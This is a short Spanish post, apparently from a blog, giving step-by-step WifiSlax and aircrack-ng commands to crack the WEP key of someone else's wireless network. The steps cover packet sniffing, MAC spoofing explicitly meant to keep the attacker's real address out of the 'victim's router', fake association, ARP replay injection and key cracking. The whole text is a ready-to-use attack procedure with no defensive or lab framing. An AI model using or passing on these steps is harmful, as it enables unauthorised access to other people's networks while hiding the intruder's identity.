• WifiSlax

    Resumen rapido de los pasos a seguir:

    1. Wifislax > Asistencia chipset > Asistencia Intel Pro Wireless > Recargar modulo ipw 2200 inyeccion.
    2. iwconfig –> Para ver interfaces (ethx).
    3. airodump-ng -w captura rtap0 –> Se activa el sniffer o capturador de paquetes.

    Se abre una nueva consola o shell:

    1. kmdr-executor /usr/share/wifislax/macchanger-conf.kmdr –> Cambiamos la MAC de nuestro PC para que no se registre en el router de la victima nuestra verdadera MAC.
    2. iwconfig ethx essid “ESSID_A_CRACKEAR” channel z key 66666 –> Asociacion falsa a la red que queremos crackear (x y z se deben cambiar por los valores pertinentes).
    3. aireplay-ng -3 -x 1024 – b MAC_ROUTER_CRACKEAR -h 00:11:22:33:44:55 -i rtap ethx –> inyeccion de paquetes para capturar IVs
    4. Cuando los ARP Request esta en mas o menos 40 000, se para la inyeccion con CTRL + D.
    5. Se para el sniffer con CTRL + D (la 1ª shell).
    6. Se procede a crackear la contraseña a partir de la captura mediante aircrack-ng – z captura.cap.

    Tags: , , ,